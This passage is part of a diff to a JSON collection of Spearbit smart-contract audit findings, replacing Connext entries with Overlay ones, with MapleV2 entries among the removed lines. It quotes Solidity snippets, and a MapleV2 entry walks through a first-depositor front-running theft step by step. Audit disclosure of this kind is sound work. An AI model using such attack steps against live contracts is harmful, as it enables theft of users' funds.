You'll have to manually verify all markets individually. Additionally, there is a needless salt in OverlayV1Factory.sol#L129.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "Multicall.sol not compatible with Natspec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Multicall.sol Natspec comment specifies: /// @title Multicall - Aggregate results from multiple read-only function calls However, to call those functions it uses a low-level call() method which can call write functions as well. (bool success, bytes memory ret) = calls[i].target.call(calls[i].callData);", + "title": "Potential wrap of timestamp", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "In the transform() function, a revert could occur right after timestamp32 has wrapped (e.g. when timestamp > 2**32). function transform(... , uint256 timestamp, ...) ... { uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32 ... uint256 dt = uint256(timestamp32 - self.timestamp); // could revert if timestamp32 has just wrapped ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "reimburseRelayerFees only what is necessary", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function reimburseRelayerFees() gives a maximum of relayerFeeCap to a receiver, unless it already has a balance of relayerFeeCap. This implicitly means that a balance of relayerFeeCap is sufficient. So if a receiver already has a balance, only relayerFeeCap - _to.balance is required. This way more recipients can be reimbursed with the same amount of funds in the SponsorVault. function reimburseRelayerFees(...) ... { ... if (_to.balance > relayerFeeCap || Address.isContract(_to)) { // Already has fees, and the address is a contract return; } ... sponsoredFee = sponsoredFee >= relayerFeeCap ? relayerFeeCap : sponsoredFee; ... }", + "title": "Verify the validity of _microWindow and _macroWindow", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The constructor of OverlayV1Feed doesn't verify the validity of _microWindow and _macroWindow, potentially causing the price oracle to produce bad results if misconfigured. constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "safeIncreaseAllowance and safeDecreaseAllowance can be replaced with safeApprove in _reconcileProcessPortal", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The NomadFacet uses safeIncreaseAllowance after clearing the allowance, and safeDecreaseAllowance to clear the allowance. Using safeApprove is potentially safer in this case. Some non-standard tokens only allow the allowance to change from zero, or change to zero. Using safeDecreaseAllowance would potentially break the contract in a future update. Note that SafeApprove has been deprecated due to concerns about a front-running attack.
It is only supported when setting an initial allowance or setting the allowance to zero (SafeERC20.sol#L38).", + "title": "Simplify _midFromFeed()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The calculation in _midFromFeed() is more complicated than necessary because: min(x,y) + max(x,y) == x + y. More importantly, the average operation (bid + ask) / 2 can overflow and revert if bid + ask >= 2**256. function _midFromFeed(Oracle.Data memory data) private view returns (uint256 mid_) { uint256 bid = Math.min(data.priceOverMicroWindow, data.priceOverMacroWindow); uint256 ask = Math.max(data.priceOverMicroWindow, data.priceOverMacroWindow); mid_ = (bid + ask) / 2; }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Low Risk" ] }, { - "title": "Event not emitted when ERC20 and native asset is transferred together to SponsorVault", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Any ERC20 token or native asset can be transferred to the SponsorVault contract by calling the deposit() function. It emits a Deposit() event logging the transferred asset and the amount. However, if the native asset and an ERC20 token are transferred in the same call, only a single event corresponding to the ERC20 transfer is emitted.", + "title": "Use implicit truncation of timestamp", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Solidity will truncate data when it is typecast to a smaller data type, see the Solidity documentation on explicit conversions. This can be used to simplify the following statement: uint32 timestamp32 = uint32(timestamp % 2**32); // mod to fit in uint32", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "payable keyword can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "If a function does not need to have the native asset sent to it, it is recommended not to mark it as payable, to avoid any funds getting stuck. StableSwapFacet.sol has two payable functions: swapExact() and swapExactOut, which only swap ERC20 tokens and are not expected to receive the native asset.", + "title": "Set pos.entryPrice to 0 after liquidation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The liquidate() function sets most of the values of pos to 0, with the exception of pos.entryPrice. function liquidate(address owner, uint256 positionId) external { ... // store the updated position info data. mark as liquidated pos.notional = 0; pos.debt = 0; pos.oiShares = 0; pos.liquidated = true; positions.set(owner, positionId, pos); ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] },
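The implicit-truncation point from the "Use implicit truncation of timestamp" finding above can be verified directly; a minimal sketch (contract name hypothetical):

pragma solidity ^0.8.10;

contract TruncationExample {
    // Casting to uint32 already keeps only the low 32 bits, so the explicit
    // modulo in uint32(timestamp % 2**32) is redundant.
    function truncate(uint256 timestamp) external pure returns (uint32 a, uint32 b) {
        a = uint32(timestamp % 2**32); // original form
        b = uint32(timestamp);         // implicit truncation, same result
        assert(a == b);
    }
}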
{ - "title": "Improve variable naming", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Two different variables/functions with an almost identical name are prone to error. Variable names like _routerOwnershipRenounced and _assetOwnershipRenounced do not correctly reflect their meaning as they actually refer to the ownership whitelist being renounced. function _isRouterOwnershipRenounced() internal view returns (bool) { return LibDiamond.contractOwner() == address(0) || s._routerOwnershipRenounced; } /** * @notice Indicates if the ownership of the asset whitelist has * been renounced */ function _isAssetOwnershipRenounced() internal view returns (bool) { ... bool _routerOwnershipRenounced; ... // 27 bool _assetOwnershipRenounced; The constant EMPTY is defined twice with different values. This is confusing and could lead to errors. contract BaseConnextFacet { ... bytes32 internal constant EMPTY = hex\"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470\"; ... } library LibCrossDomainProperty { ... bytes29 public constant EMPTY = hex\"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"; ... } The function xcall() uses both _args.transactingAssetId and transactingAssetId. It is easy to mix these two, but they each have a very specific meaning, and mixing them up introduces problems. function xcall(...) ... { ... address transactingAssetId = _args.transactingAssetId == address(0) ? address(s.wrapper) : _args.transactingAssetId; ... (, uint256 amount) = AssetLogic.handleIncomingAsset( _args.transactingAssetId, ... ); ... (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( ..., transactingAssetId, ... ); ... } In the _handleExecuteTransaction function of BridgeFacet, _args.amount and _amount are used. In this function: _args.amount is equal to bridged_amount; _amount is equal to bridged_amount - liquidityFee (and potentially swapped amount).", + "title": "Store result of expression in temporary variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Several gas optimizations are possible by storing the result of an expression in a temporary variable, such as the value of oiFromNotional(data, capNotionalAdjusted). function build( ... ) { ... uint256 price = isLong ? ask(data, _registerVolumeAsk(data, oi, oiFromNotional(data, capNotionalAdjusted))) : bid(data, _registerVolumeBid(data, oi, oiFromNotional(data, capNotionalAdjusted))); ... require(oiTotalOnSide <= oiFromNotional(data, capNotionalAdjusted), \"OVLV1:oi>cap\"); } A: The value of pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) could be stored in a temporary variable to save gas. B: The value of oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) could also be stored in a temporary variable to save gas and make the code more readable. C: The value of pos.oiSharesCurrent(fraction) could be stored in a temporary variable to save gas. function unwind(...) ... { ... uint256 price = pos.isLong ? bid( data, _registerVolumeBid( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A1 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B1 ) ) : ask( data, _registerVolumeAsk( data, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide), // A2 oiFromNotional(data, capNotionalAdjustedForBounds(data, capNotional)) // B2 ) ); ... if (pos.isLong) { oiLong -= Math.min( oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A3 ); oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); // C1 } else { oiShort -= Math.min( oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide) // A4 ); oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); // C2 } ...
pos.oiShares -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); // C3 } The value of 2 * k * timeElapsed could also be stored in a temporary variable: function oiAfterFunding( ...) ... { ... if (2 * k * timeElapsed < MAX_NATURAL_EXPONENT) { fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "onlyRemoteRouter can be circumvented", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "BaseConnextFacet-fix. However, the change has not been applied to Router.sol#L56-L58 which is currently in use. The modifier onlyRemoteRouter() can be misled if the sender parameter has the value 0. The modifier uses _m.sender() from the message received via Nomad. Assuming all checks of Nomad work as expected, this value cannot be 0 as it originates from a msg.sender in Home.sol. contract Replica is Version0, NomadBase { function process(bytes memory _message) public returns (bool _success) { ... bytes29 _m = _message.ref(0); ... // ensure message has been proven bytes32 _messageHash = _m.keccak(); require(acceptableRoot(messages[_messageHash]), \"!proven\"); ... IMessageRecipient(_m.recipientAddress()).handle( _m.origin(), _m.nonce(), _m.sender(), _m.body().clone() ); ... } } contract BridgeRouter is Version0, Router { function handle(uint32 _origin,uint32 _nonce,bytes32 _sender,bytes memory _message) external override onlyReplica onlyRemoteRouter(_origin, _sender) { ... } } abstract contract Router is XAppConnectionClient, IMessageRecipient { ... modifier onlyRemoteRouter(uint32 _origin, bytes32 _router) { require(_isRemoteRouter(_origin, _router), \"!remote router\"); _; } function _isRemoteRouter(uint32 _domain, bytes32 _router) internal view returns (bool) { return remotes[_domain] == _router; // if _router == 0 then this is true for random _domains } }", + "title": "Flatten code of OverlayV1UniswapV3Feed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Functions _fetch(), _inputsToConsultMarketPool(), _inputsToConsultOvlWethPool() and consult() do a lot of interactions with small arrays and loops over them, increasing overhead and reading difficulty.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] },
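Referring back to the "Store result of expression in temporary variable" finding above, a minimal sketch of the caching pattern (hypothetical functions, not Overlay's code):

pragma solidity ^0.8.10;

contract CachingExample {
    function expensive(uint256 x) internal pure returns (uint256) {
        return x * x + 7; // stand-in for a costly computation
    }

    function useCached(uint256 x) external pure returns (uint256) {
        uint256 cached = expensive(x); // computed once
        return cached + cached / 2;    // reused instead of recomputed
    }
}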
{ - "title": "Some dust not accounted for in reconcile()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The function _handleExecuteLiquidity() in BridgeFacet takes care of rounding issues in toSwap / pathLen. However, the inverse function reconcile() in NomadFacet does not do that. So, tiny amounts of tokens (dust) are not accounted for in reconcile(). contract BridgeFacet is BaseConnextFacet { ... function _handleExecuteLiquidity(...) ... { ... // For each router, assert they are approved, and deduct liquidity. uint256 routerAmount = toSwap / pathLen; for (uint256 i; i < pathLen - 1; ) { s.routerBalances[_args.routers[i]][_args.local] -= routerAmount; unchecked { ++i; } } // The last router in the multipath will sweep the remaining balance to account for remainder dust. uint256 toSweep = routerAmount + (toSwap % pathLen); s.routerBalances[_args.routers[pathLen - 1]][_args.local] -= toSweep; } } } contract NomadFacet is BaseConnextFacet { ... function reconcile(...) ... { ... uint256 routerAmt = toDistribute / pathLen; for (uint256 i; i < pathLen; ) { s.routerBalances[routers[i]][localToken] += routerAmt; unchecked { ++i; } } } }", + "title": "Replace memory with calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "External calls to functions with memory parameters can be made more gas efficient by replacing memory with calldata, as long as the memory parameters are not modified.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Careful with the decimals of BridgeTokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The BridgeRouter sends token details including the decimals() over the Nomad bridge to configure a newly deployed token. After setting the hash with setDetailsHash() anyone can call setDetails() on the token to set the details. The decimals() are mainly used for user interfaces, so it might not be a large problem when setDetails() is executed at a later point in time. However, initializeSwap() also uses decimals(); this is called via off-chain code. In the example code of initializeSwap.ts it retrieves the decimals() from the deployed token on the destination chain. This introduces a race condition between setDetails() and initializeSwap.ts: depending on which is executed first, the swaps will have different results. Note: It could also break the ConnextPriceOracle. contract BridgeRouter is Version0, Router { ... function _send( ... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... // query token contract for details and calculate detailsHash _detailsHash = BridgeMessage.getDetailsHash(_t.name(), _t.symbol(), _t.decimals()); } else { ... } } function _handleTransfer(...) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... } else { ... IBridgeToken(_token).setDetailsHash(_action.detailsHash()); // so hash is set now } } } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function setDetails(..., uint8 _newDecimals) ... { // can be called by anyone ... require( _isFirstDetails || BridgeMessage.getDetailsHash(..., _newDecimals) == detailsHash, \"!committed details\" ); ... token.decimals = _newDecimals; ... } } Example script: initializeSwap.ts const decimals = await Promise.all([ (await ethers.getContractAt(\"TestERC20\", local)).decimals(), (await ethers.getContractAt(\"TestERC20\", adopted)).decimals(), // setDetails might not have been done ]); const tx = await connext.initializeSwap(..., decimals, ... ); contract SwapAdminFacet is BaseConnextFacet { ... function initializeSwap(..., uint8[] memory decimals, ... ) ... { ... for (uint8 i; i < numPooledTokens; ) { ... precisionMultipliers[i] = 10**uint256(SwapUtils.POOL_PRECISION_DECIMALS - decimals[i]); ... } } }", + "title": "No need to cache immutable values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Variables microWindow and macroWindow are immutable, so it is not necessary to cache them because the compiler inlines their value. contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { function _fetch() internal view virtual override returns (Oracle.Data memory) { // cache micro and macro windows for gas savings uint256 _microWindow = microWindow; uint256 _macroWindow = macroWindow; ...
} } abstract contract OverlayV1Feed is IOverlayV1Feed { ... uint256 public immutable microWindow; uint256 public immutable macroWindow; ... constructor(uint256 _microWindow, uint256 _macroWindow) { microWindow = _microWindow; macroWindow = _macroWindow; } }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect comment about ERC20 approval to zero-address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The linked code notes in a comment: // NOTE: if pool is not registered here, then the approval will fail // as it will approve to the zero-address SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); This is not always true. The ERC20 spec doesn't have this restriction, and ERC20 tokens based on solmate also don't revert on approving to the zero-address. There is no risk here as the following line of code for zero-address pools will revert. return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut);", + "title": "Simplify circuitBreaker", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function circuitBreaker() does a divDown() which can be avoided to save gas and improve readability. function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) ... { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (uint256(minted).divDown(_circuitBreakerMintTarget) >= 2 * ONE) { return 0; } ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] },
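As the "No need to cache immutable values" finding above explains, immutables are inlined into the deployed bytecode; a minimal sketch (contract name hypothetical):

pragma solidity ^0.8.10;

contract ImmutableExample {
    // Immutable values are embedded in the runtime bytecode at construction
    // time, so reading one costs no SLOAD and a local cache buys nothing.
    uint256 public immutable microWindow;

    constructor(uint256 _microWindow) {
        microWindow = _microWindow;
    }

    function twiceWindow() external view returns (uint256) {
        return 2 * microWindow; // direct read; no caching needed
    }
}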
{ - "title": "Native asset is delivered even if the wrapped asset is transferred", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "Connext delivers the native asset on the destination chain even if the wrapped asset was transferred. This is because on the source chain the native asset is converted to the wrapped asset, and then the distinction is lost. On the destination chain it is not possible to know which of these two assets was transferred, and hence a choice is made to transfer the native asset. if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ...", + "title": "Optimizations if data.macroWindow is constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Several checks are done in contract OverlayV1Market which involve data.macroWindow in combination with a linear calculation. If data.macroWindow does not change (as is the case with the UniswapV3 feed), it is possible to optimize the calculations by precalculating several values.", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Entire transfer amount is borrowed from AAVE Portal when a router has insufficient balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "If the router picked by the Sequencer doesn't have enough balance to transfer the required amount, it can borrow the entire amount from Aave Portal. For a huge amount, it will block borrowing for other routers since there is a limit on the total maximum amount that can be borrowed.", + "title": "Remove unused / redundant functions and variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Functions nextPositionId() and mid() in OverlayV1Market.sol are not used internally and don't appear to be useful. contract OverlayV1Market is IOverlayV1Market { function nextPositionId() external view returns (uint256) { return _totalPositions; } function mid(Oracle.Data memory data,uint256 volumeBid,uint256 volumeAsk) ... { ... } } The functions oiInitial() and oiSharesCurrent() in library Position.sol have the same implementation. The oiInitial() function does not seem useful as it retrieves current positions and not initial ones. library Position { /// @notice Computes the initial open interest of position when built ... function oiInitial(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } /// @notice Computes the current shares of open interest position holds ... function oiSharesCurrent(Info memory self, uint256 fraction) internal pure returns (uint256) { return _oiShares(self).mulUp(fraction); } } The function liquidationPrice() in library Position.sol is not used by the contracts. Because its type is internal, it cannot be called from the outside either. library Position { function liquidationPrice(... ) internal pure returns (uint256 liqPrice_) { ... } } The variables ovlWethToken0 and ovlWethToken1 are stored but not used anymore. constructor(..., address _ovlWethPool,...) .. { ... // need OVL/WETH pool for ovl vs ETH price to make reserve conversion from ETH => OVL address _ovlWethToken0 = IUniswapV3Pool(_ovlWethPool).token0(); address _ovlWethToken1 = IUniswapV3Pool(_ovlWethPool).token1(); ... ovlWethToken0 = _ovlWethToken0; ovlWethToken1 = _ovlWethToken1; ... }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Unused variable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The variable message is not used after declaration. bytes memory message;", + "title": "Optimize power functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "In contract OverlayV1Market.sol, several power calculations are done with EULER / INVERSE_EULER as a base, which can be optimized to save gas. function dataIsValid(Oracle.Data memory data) public view returns (bool) { ... uint256 dpLowerLimit = INVERSE_EULER.powUp(pow); uint256 dpUpperLimit = EULER.powUp(pow); ...
} Note: As the Overlay team confirmed, less precision might be sufficient for this calculation. OverlayV1Market.sol: fundingFactor = INVERSE_EULER.powDown(2 * k * timeElapsed); OverlayV1Market.sol: bid_ = bid_.mulDown(INVERSE_EULER.powUp(pow)); OverlayV1Market.sol: ask_ = ask_.mulUp(EULER.powUp(pow));", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect Natspec for adopted and canonical asset mappings", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "adoptedToCanonical maps adopted assets to canonical assets, but is described as a "Mapping of canonical to adopted assets"; canonicalToAdopted maps canonical assets to adopted assets, but is described as a "Mapping of adopted to canonical assets". // /** // * @notice Mapping of canonical to adopted assets on this domain // * @dev If the adopted asset is the native asset, the keyed address will // * be the wrapped asset address // */ // 12 mapping(address => TokenId) adoptedToCanonical; // /** // * @notice Mapping of adopted to canonical on this domain // * @dev If the adopted asset is the native asset, the stored address will be the // * wrapped asset address // */ // 13 mapping(bytes32 => address) canonicalToAdopted;", + "title": "Redundant Math.min()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function capNotionalAdjustedForCircuitBreaker() calculates circuitBreaker() and then does a Math.min(cap,...) with the result. However, circuitBreaker() already returns a value that is <= cap, so the Math.min(...) call is unnecessary. function capNotionalAdjustedForCircuitBreaker(uint256 cap) public view returns (uint256) { ... cap = Math.min(cap, circuitBreaker(snapshot, cap)); return cap; } function circuitBreaker(Roller.Snapshot memory snapshot, uint256 cap) public view returns (uint256) { ... if (minted <= int256(_circuitBreakerMintTarget)) { return cap; } else if (...) { return 0; } // so minted > _circuitBreakerMintTarget, thus minted / _circuitBreakerMintTarget > ONE ... uint256 adjustment = 2 * ONE - uint256(minted).divDown(_circuitBreakerMintTarget); // so adjustment <= ONE return cap.mulDown(adjustment); // so this is <= cap }", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Use of SafeMath for solc >= 0.8", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "AmplificationUtils, SwapUtils, ConnextPriceOracle, GovernanceRouter.sol use SafeMath. Since 0.8.0, arithmetic in Solidity reverts if it overflows or underflows, hence there is no need to use OpenZeppelin's SafeMath library.", + "title": "Replace square with multiplication", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The contract OverlayV1Market.sol contains the following expression several times: x.powDown(2 * ONE). This computes the square of x. However, it can also be calculated in a more gas efficient way: function oiAfterFunding(...) { ... uint256 underRoot = ONE - oiImbalanceBefore.divDown(oiTotalBefore).powDown(2 * ONE).mulDown( ONE - fundingFactor.powDown(2 * ONE) ); ...
}", "labels": [ "Spearbit", - "Connext", - "Severity: Informational" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "First pool depositor can be front-run and have part of their deposit stolen", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The first deposit with a totalSupply of zero shares will mint shares equal to the deposited amount. This makes it possible to deposit the smallest unit of a token and profit off a rounding issue in the computation for the minted shares of the next depositor: (shares_ * totalAssets()) / totalSupply_ Example: The first depositor (victim) wants to deposit 2M USDC (2e12) and submits the transaction. The attacker front runs the victim's transaction by calling deposit(1) to get 1 share. They then transfer 1M USDC (1e12) to the contract, such that totalAssets = 1e12 + 1, totalSupply = 1. When the victim's transaction is mined, they receive 2e12 / (1e12 + 1) * totalSupply = 1 shares (rounded down from 1.9999...). The attacker withdraws their 1 share and gets 3M USDC * 1 / 2 = 1.5M USDC, making a 0.5M profit. During the migration, an _initialSupply of shares to be airdropped are already minted at initialization and are not affected by this attack.", + "title": "Retrieve roles via constants in import", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Within contract OverlayV1Factory.sol, the roles GOVERNOR_ROLE, MINTER_ROLE, BURNER_ROLE are retrieved via an external function call. To save gas they could also be retrieved as constants via import. Additionally, a role ADMIN_ROLE is defined in contract OverlayV1Token.sol, which is the same as DEFAULT_ADMIN_- ROLE of AccessControl.sol. This ADMIN_ROLE could be replaced with DEFAULT_ADMIN_ROLE. modifier onlyGovernor() { - + require(ovl.hasRole(ovl.GOVERNOR_ROLE(), msg.sender), \"OVLV1: !governor\"); require(ovl.hasRole(GOVERNOR_ROLE, msg.sender), \"OVLV1: !governor\"); _; } ... function deployMarket(...) { ... ovl.grantRole(ovl.MINTER_ROLE(), market_); ovl.grantRole(MINTER_ROLE, market_); ovl.grantRole(ovl.BURNER_ROLE(), market_); ovl.grantRole(BURNER_ROLE, market_); ... - + - + }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: High Risk" + "Overlay", + "Severity: Gas Optimization" ] }, { - "title": "Users depositing to a pool with unrealized losses will take on the losses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The pool share price used for deposits is always the totalAssets() / totalSupply, however the pool share price when redeeming is totalAssets() - unrealizedLosses() / totalSupply. The unrealized- Losses value is increased by loan impairments (LM.impairLoan) or when starting triggering a default with a liq- uidation (LM.triggerDefault). The totalAssets are only reduced by this value when the loss is realized in LM.removeLoanImpairment or LM.finishCollateralLiquidation. This leads to a time window where deposits use a much higher share price than current redemptions and future deposits. Users depositing to the pool during this time window are almost guaranteed to make losses when they In the worst case, a Pool.deposit might even be (accidentally) front-run by a loan impairment or are realized. 
liquidation.", + "title": "Double check action when snapAccumulator == 0 in transform()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function transform() does a check for snapAccumulator + value == 0 (where all variables are of type int256). This could be true if value == -snapAccumulator (or snapAccumulator == value == 0) A comment shows this is to prevent division by 0 later on. The division is based on abs(snapAccumulator) + abs(value). So this will only fail when snapAccumulator == value == 0. function transform(...) ... { ... int256 accumulatorNow = snapAccumulator + value; if (accumulatorNow == 0) { // if accumulator now is zero, windowNow is simply window // to avoid 0/0 case below return ... ---> this comment might not be accurate } ... uint256 w1 = uint256(snapAccumulator >= 0 ? snapAccumulator : -snapAccumulator); // w1 = abs(snapAccumulator) uint256 w2 = uint256(value >= 0 ? value : -value); uint256 windowNow = (w1 * (snapWindow - dt) + w2 * window) / (w1 + w2); // only fails if w1 == w2 == 0 ... // w2 = abs(value) ,! ,! }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Medium Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "TransitionLoanManager.add does not account for accrued interest since last call", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The TransitionLoanManager.add advances the domain start but the accrued interest since the last domain start is not accounted for. If add is called several times, the accounting will be wrong. It therefore wrongly tracks the _accountedInterest variable.", + "title": "Add unchecked in natural log (ln) function or remove the functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function ln() in contract LogExpMath.sol does not use unchecked, while the function log() does. Note: Neither ln() nor log() are used, so they could also be deleted. function log(int256 arg, int256 base) internal pure returns (int256) { unchecked { ... } } function ln(int256 a) internal pure returns (int256) { // no unchecked }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Medium Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Unaccounted collateral is mishandled in triggerDefault", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The control flow of triggerDefault is partially determined by the value of MapleLoanLike(loan_- ).collateral() == 0. The code later assumes there are 0 collateral tokens in the loan if this value is true, which is incorrect in the case of unaccounted collateral tokens. In non-liquidating repossessions, this causes an overes- timation of the number of fundsAsset tokens repossessed, leading to a revert in the _disburseLiquidationFunds function. Anyone can trigger this revert by manually transferring 1 Wei of collateralAsset to the loan itself. 
In liquidating repossessions, a similar issue causes the code to call the liquidator's setCollateralRemaining function with only accounted collateral, meaning unaccounted collateral will be unused/stuck in the liquidator.", + "title": "Add unchecked in natural log (ln) function or remove the functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function ln() in contract LogExpMath.sol does not use unchecked, while the function log() does. Note: Neither ln() nor log() are used, so they could also be deleted. function log(int256 arg, int256 base) internal pure returns (int256) { unchecked { ... } } function ln(int256 a) internal pure returns (int256) { // no unchecked }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Medium Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Initial cycle time is wrong when queuing several config updates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The initial cycle time will be wrong if there's already an upcoming config change that changes the cycle duration. Example: currentCycleId: 100 